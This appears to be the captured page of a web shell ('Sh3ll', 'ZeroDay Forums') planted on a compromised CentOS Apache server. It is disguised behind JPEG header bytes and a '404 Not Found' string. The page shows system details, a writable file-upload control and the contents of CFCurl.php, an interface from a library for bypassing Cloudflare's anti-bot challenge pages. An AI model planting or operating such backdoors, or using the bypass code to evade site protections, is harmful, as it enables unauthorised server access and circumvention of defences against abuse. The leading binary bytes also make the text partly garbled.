����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/img.123vid.top/vendor/kyranrana/src/main/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/img.123vid.top/vendor/kyranrana/src/main/CFCurl.php
<?php

namespace CloudflareBypass;

use CloudflareBypass\Model\UAMOptions;

/**
 * Interface CFCurl
 *      - Used for executing cURL requests.
 *
 * @package CloudflareBypass
 */
interface CFCurl
{
    /**
     * Executes cURL request and handles UAM page if it appears.
     * NOTE: This method will enable cookie engine on the cURL handle by setting CURLOPT_COOKIELIST to an empty string.
     *
     * Prerequisites:
     *      CURLOPT_HEADER_OUT is true.
     *      CURLOPT_VERBOSE is false
     *
     * @param mixed $curlHandle cURL handle
     * @param UAMOptions $uamOptions UAM options
     * @param int $retry Current retry (INTERNAL)
     * @param bool $keepHandle TRUE to keep original cURL handle (INTERNAL).
     * @return string cURL response body
     * @throws \ErrorException if JS evaluation fails
     * @throws \ErrorException if captcha page is shown
     * @throws \ErrorException if correct headers are not set.
     * @throws \ErrorException if clearance cookie is not found.
     */
    public function exec($curlHandle, UAMOptions $uamOptions, int $retry = 0, bool $keepHandle = false): string;

    /**
     * Handles UAM page if it appears.
     *
     * @param mixed $curlHandle cURL handle
     * @param UAMOptions $uamOptions UAM options
     * @param string $page Page contents
     * @param array $info Page info
     * @param int $retry Current retry (INTERNAL)
     * @param bool $keepHandle TRUE to keep original cURL handle (INTERNAL).
     * @return string cURL response body
     * @throws \ErrorException if JS evaluation fails
     * @throws \ErrorException if captcha page is shown
     * @throws \ErrorException if correct headers are not set.
     * @throws \ErrorException if clearance cookie is not found.
     */
    public function bypassIUAMPage($curlHandle, string $page, array $info, int $retry, UAMOptions $uamOptions, bool $keepHandle): string;
}

ZeroDay Forums Mini